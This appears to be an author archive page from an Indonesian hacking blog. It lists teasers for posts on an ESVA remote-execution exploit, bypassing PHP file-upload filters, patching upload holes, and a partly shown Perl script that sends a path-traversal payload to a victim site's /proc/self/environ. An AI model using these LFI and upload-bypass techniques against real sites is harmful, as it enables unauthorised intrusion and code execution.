Home / ijoo

ijoo

E-Mail Security Virtual Appliance (ESVA) Exploit.

black-hat-logo

# Exploit Title: E-Mail Security Virtual Appliance (ESVA) Remote Execution. # Date: 10 Aug 2012 # Exploit Author: iJoo # Vendor Homepage: http://www.esvacommunity.com/ # Software Link: http://sourceforge.net/projects/esva-project/ # Version: < 2.0.6 ESVA (E-Mail Security Virtual Appliance) is a pre-built and semi-configured email scanning appliance that will run on VMware Workstation, …

Read More »

Bypass PHP Arbitrary File Upload

5853392218_18e8164613_z

Ok semua.. Sekarang saya akan melanjutkan pembahasan Tentang PHP Arbitrary File Upload. Yang sebelumnya telah dibahas di: http://www.binushacker.net/php-arbitrary-file-upload-simple-patching.html Ok disana patchingnya emang ga terlalu bagus… Karena filetype bisa di manipulasi.. Bukan dengan merename shell.jpg.php tetapi dengan memanipulasi “header” file Cara membypassnya adalah sebagai berikut: Review codenya dulu Kalo kita coba …

Read More »

PHP Arbitrary File Upload Simple Patching

file-upload-patch

Saya akan membahas tentang cara simple mempatch PHP Arbitrary File Upload. Kebanyakan website yang vuln diupload memiliki garis besar seperti ini: Contoh simple upload.php file upload. [crayon-5d5902d19d2f5261093527/] Contoh form yang dipake dalam file index untuk upload: [crayon-5d5902d19d306423485510/] Disini tidak ada code yang memfilter upload filetype. Jadi kita bisa langsung saja …

Read More »

LFI Remote Execute in PERL

black-hat-logo

Script berikut untuk menjalankan/mengeksekusi LFI proc/elft/environ secara simple di shell. #! /usr/bin/perl use LWP; use HTTP::Request; if (@ARGV < 1) { print "\n==========================================\n"; print " LFI Command Execution \n"; print "==========================================\n"; print "Usage: perl LFI.pl (without http:://)\n"; print "Ex. perl FLI.pl www.korban.com/index.php?page=\n"; exit; } $host=$ARGV[0]; $lfi = "..%2F..%2F..%2F..%2F..%2F..%2Fproc%2Fself%2Fenviron"; print "Try …

Read More »